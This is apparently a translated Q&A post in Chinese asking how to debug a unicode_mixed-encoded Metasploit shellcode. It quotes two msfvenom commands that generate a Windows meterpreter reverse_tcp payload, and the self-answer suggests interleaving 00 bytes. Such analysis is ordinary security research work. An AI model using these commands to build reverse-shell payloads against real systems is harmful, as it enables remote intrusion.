【问题标题】:Debug unicode msfvenom payload调试 unicode msfvenom 有效负载
【发布时间】:2021-01-06 16:04:16
【问题描述】:

我想调试一些msfvenom 生成的有效负载。 当我以这种方式使用“标准”编码生成有效负载时,我完全能够做到这一点:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/alpha_mixed BufferRegister=ECX

在这种情况下,我可以获得生成的有效负载,使用 Blobrunner 之类的东西,我准备好了。

如果我生成一个带有 unicode 编码的 shellcode

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/unicode_mixed BufferRegister=ECX

同样不起作用:我在处理 shellcode 时收到很多重复/无效的指令。这是有道理的,因为我想我将它作为正常编码进行管理。但是如何调试这个 shellcode?有什么工具可以将其转换为删除“unicode padding”的“有效”序列?

非常感谢!

【问题讨论】:

    标签: shellcode metasploit


    【解决方案1】:

    我想我明白了:只需在字节之间添加一个带有 00 的交错...简单...不知道为什么我之前错过了它...

    【讨论】:

      猜你喜欢
      • 1970-01-01
      • 2018-09-19
      • 2019-02-27
      • 2021-07-12
      • 2017-12-09
      • 2018-06-29
      • 1970-01-01
      • 2017-02-25
      • 2015-02-23
      相关资源
      最近更新 更多